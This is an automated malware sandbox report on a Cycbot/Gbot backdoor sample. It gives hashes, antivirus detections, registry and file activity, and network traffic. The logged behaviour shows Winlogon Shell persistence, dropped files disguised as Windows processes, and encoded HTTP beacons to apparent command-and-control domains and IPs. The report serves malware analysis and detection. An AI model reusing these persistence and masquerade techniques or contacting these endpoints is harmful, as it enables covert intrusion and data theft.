Analysis Date: 2014-11-12 23:29:12
MD5: c113761cc26775780567c521bda16fbc
SHA1: ab2ea29de5082ed7622f1de420c02c5b3de9319a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: f416a155a728dfe20626414877fcd328 sha1: e4d767ad69fed5e21667edad7859241a2a420217 size: 117760
Section: .rdata md5: 647d1eeb62e395f83be513b8d7124b5d sha1: 058fa364ad01ed54e503e973dea54ecdb22feaa6 size: 1024
Section: .data md5: ad844ad79819da60f30c769b45511f73 sha1: 18e3de783d695b9e2c35eb99027efe788f0f65f4 size: 53760
Section: .apexi md5: 440c6998960f7698146d54cb6d13d16f sha1: af405910f53ef6533982b65fdb77b09dda285302 size: 1024
Timestamp: 2005-11-10 11:39:12
Version: ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1502
PEhash: a831dbf5c591f8233e5149ca70a5282098a83ad2
IMPhash: 49910ca797e2849f8f0f66f4a84e45c6
AV: 360 Safe: Gen:Trojan.Heur.KS.1
AV: Ad-Aware: Gen:Trojan.Heur.KS.1
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): no_virus
AV: Authentium: W32/Goolbot.G.gen!Eldorado
AV: Avira (antivir): BDS/Gbot.aida
AV: BullGuard: Gen:Trojan.Heur.KS.1
AV: CA (E-Trust Ino): Win32/Diple.A!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Win.Trojan.Cycbot-1963
AV: Dr. Web: BackDoor.Gbot.32
AV: Emsisoft: Gen:Trojan.Heur.KS.1
AV: Eset (nod32): Win32/Kryptik.MIA
AV: Fortinet: W32/Gbot.B!tr.bdr
AV: Frisk (f-prot): W32/Goolbot.G.gen!Eldorado
AV: F-Secure: Gen:Trojan.Heur.KS.1
AV: Grisoft (avg): Win32/Heri
AV: Ikarus: Backdoor.Win32.Gbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: Trojan.Agent
AV: Mcafee: BackDoor-EXI.gen.i
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV: Norman: Gen:Trojan.Heur.KS.1
AV: Rising: no_virus
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Cycbot!gen3
AV: Trend Micro: BKDR_CYCBOT.SMX
AV: VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: pdadatarestore.com
Winsock DNS: 127.0.0.1
Winsock DNS: extremerollerclub.com
Winsock DNS: nationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: nationsautoelectric.com
Type: A
98.139.135.198
DNS: zonetf.com
Type: A
141.8.225.80
DNS: zonetf.com
Type: A
141.8.225.80
DNS: extremerollerclub.com
Type: A
DNS: pdadatarestore.com
Type: A
HTTP GET: http://nationsautoelectric.com/images/50-217-1_F_1_.jpg?v78=85&tq=gKZEtzywlk9jNssB2s%2Ba%2BadB9C2AmZ9JuPxwxjhYR7vrg0UPA3kVINTzq050TySuTpJ1%2Bs2OSRlmZHZERqQ9LVJnR3EPLqJvk%2FraoeO6wNn8CODKzuL6ObGE62f6Wpozo7gJ3hxE1X9VhwaIsrb0bGS0sXTb8Y6koDvozfoUnZwZAWnlFILT4%2F1fwCmcFfEps%2Fghj96SQ4HwlnyLGtg%2Fuu4rPgjk4lQq8Y8aRmwm2fLDYMBh3EkgF6iBOZPaeTlPg1J9DAQ4i0C4jtePfyeeEM8J4U0o%2FQMAfASxCzlwbf24NxQ9IiWi1LMrU6Z1jFMlCeceWo03rJvsdBgT46VSegcQpyHpSZtmS5xsGHHzYaz6cEU54iiYIy0eAlFsT13rU5YDc3lOr5MMSj2YQD
User-Agent: mozilla/2.0
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 98.139.135.198:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap

Strings